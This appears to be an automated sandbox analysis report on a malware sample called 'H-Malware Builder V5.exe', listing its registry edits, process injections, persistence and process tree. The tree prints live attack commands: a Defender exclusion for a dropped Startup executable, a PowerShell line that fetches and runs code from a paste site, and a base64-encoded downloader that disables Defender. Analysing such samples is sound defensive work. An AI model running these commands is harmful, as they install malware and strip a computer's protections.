Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4860	SCHTASKS.exe
5036	SCHTASKS.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3556	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3520	powershell.exe
3520	powershell.exe
2500	Stub.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
4232	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
4232	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3940	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3940	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3940	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3676	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3940	powershell.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe
3784	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3556	Explorer.EXE
760	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	2500	Stub.exe
Token: SeDebugPrivilege	2500	Stub.exe
Token: SeDebugPrivilege	3784	dllhost.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeShutdownPrivilege	3556	Explorer.EXE
Token: SeCreatePagefilePrivilege	3556	Explorer.EXE
Token: SeShutdownPrivilege	3556	Explorer.EXE
Token: SeCreatePagefilePrivilege	3556	Explorer.EXE
Token: SeShutdownPrivilege	3556	Explorer.EXE
Token: SeCreatePagefilePrivilege	3556	Explorer.EXE
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeShutdownPrivilege	3556	Explorer.EXE
Token: SeCreatePagefilePrivilege	3556	Explorer.EXE
Token: SeShutdownPrivilege	3044	svchost.exe
Token: SeCreatePagefilePrivilege	3044	svchost.exe
Token: SeShutdownPrivilege	3044	svchost.exe
Token: SeCreatePagefilePrivilege	3044	svchost.exe
Token: SeShutdownPrivilege	3044	svchost.exe
Token: SeCreatePagefilePrivilege	3044	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeUndockPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeUndockPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
760	taskmgr.exe

Suspicious use of SetWindowsHookEx 39 IoCs

pid	Process
4580	Conhost.exe
3804	Conhost.exe
3496	Conhost.exe
4952	Conhost.exe
3144	Conhost.exe
4752	Conhost.exe
3772	Process not Found
880	Conhost.exe
3372	Conhost.exe
4764	Conhost.exe
1880	Process not Found
2408	Conhost.exe
3556	Explorer.EXE
3556	Explorer.EXE
2332	Conhost.exe
1880	Conhost.exe
3500	Conhost.exe
456	Process not Found
2660	Conhost.exe
1968	Conhost.exe
4444	Conhost.exe
4356	Conhost.exe
3996	Conhost.exe
2724	Conhost.exe
3252	Conhost.exe
348	Conhost.exe
1928	Conhost.exe
4436	Conhost.exe
5100	Conhost.exe
3556	Explorer.EXE
3556	Explorer.EXE
2188	Conhost.exe
4380	Conhost.exe
1968	Process not Found
3708	Conhost.exe
3532	Conhost.exe
3772	Conhost.exe
3996	Conhost.exe
3232	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3568	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 3520	4804	H-Malware Builder V5.exe	83
PID 4804 wrote to memory of 3520	4804	H-Malware Builder V5.exe	83
PID 4804 wrote to memory of 2500	4804	H-Malware Builder V5.exe	85
PID 4804 wrote to memory of 2500	4804	H-Malware Builder V5.exe	85
PID 4804 wrote to memory of 2884	4804	H-Malware Builder V5.exe	86
PID 4804 wrote to memory of 2884	4804	H-Malware Builder V5.exe	86
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 3784	2500	Stub.exe	87
PID 2500 wrote to memory of 4168	2500	Stub.exe	88
PID 2500 wrote to memory of 4168	2500	Stub.exe	88
PID 2500 wrote to memory of 5036	2500	Stub.exe	90
PID 2500 wrote to memory of 5036	2500	Stub.exe	90
PID 2500 wrote to memory of 4860	2500	Stub.exe	91
PID 2500 wrote to memory of 4860	2500	Stub.exe	91
PID 4168 wrote to memory of 3676	4168	cmd.exe	94
PID 4168 wrote to memory of 3676	4168	cmd.exe	94
PID 3784 wrote to memory of 616	3784	dllhost.exe	5
PID 3784 wrote to memory of 672	3784	dllhost.exe	7
PID 3784 wrote to memory of 960	3784	dllhost.exe	12
PID 3784 wrote to memory of 332	3784	dllhost.exe	13
PID 3784 wrote to memory of 448	3784	dllhost.exe	14
PID 3784 wrote to memory of 956	3784	dllhost.exe	15
PID 3784 wrote to memory of 1040	3784	dllhost.exe	16
PID 3784 wrote to memory of 1064	3784	dllhost.exe	17
PID 3784 wrote to memory of 1212	3784	dllhost.exe	19
PID 3784 wrote to memory of 1220	3784	dllhost.exe	20
PID 3784 wrote to memory of 1328	3784	dllhost.exe	21
PID 3784 wrote to memory of 1344	3784	dllhost.exe	22
PID 3784 wrote to memory of 1392	3784	dllhost.exe	23
PID 3784 wrote to memory of 1436	3784	dllhost.exe	24
PID 3784 wrote to memory of 1448	3784	dllhost.exe	25
PID 3784 wrote to memory of 1464	3784	dllhost.exe	26
PID 3784 wrote to memory of 1608	3784	dllhost.exe	27
PID 3784 wrote to memory of 1616	3784	dllhost.exe	28
PID 3784 wrote to memory of 1680	3784	dllhost.exe	29
PID 3784 wrote to memory of 1756	3784	dllhost.exe	30
PID 3784 wrote to memory of 1828	3784	dllhost.exe	31
PID 3784 wrote to memory of 1848	3784	dllhost.exe	32
PID 3784 wrote to memory of 1956	3784	dllhost.exe	33
PID 3784 wrote to memory of 2012	3784	dllhost.exe	34
PID 3784 wrote to memory of 2020	3784	dllhost.exe	35
PID 3784 wrote to memory of 1724	3784	dllhost.exe	36
PID 3784 wrote to memory of 2136	3784	dllhost.exe	37
PID 3784 wrote to memory of 2152	3784	dllhost.exe	38
PID 3784 wrote to memory of 2244	3784	dllhost.exe	40
PID 3784 wrote to memory of 2356	3784	dllhost.exe	41
PID 3784 wrote to memory of 2464	3784	dllhost.exe	42
PID 3784 wrote to memory of 2472	3784	dllhost.exe	43
PID 3784 wrote to memory of 2664	3784	dllhost.exe	44
PID 3784 wrote to memory of 2676	3784	dllhost.exe	45
PID 3784 wrote to memory of 2784	3784	dllhost.exe	46
PID 3784 wrote to memory of 2828	3784	dllhost.exe	47
PID 3784 wrote to memory of 2840	3784	dllhost.exe	48
PID 3784 wrote to memory of 2852	3784	dllhost.exe	49
PID 3784 wrote to memory of 2860	3784	dllhost.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1886fbc6-febb-4b11-b087-7f83c54105d5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3784

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1212
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1616
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1724

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2852

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2896

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3428

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3556
- C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3520
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4168
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        6⤵
        Blocklisted process makes network request
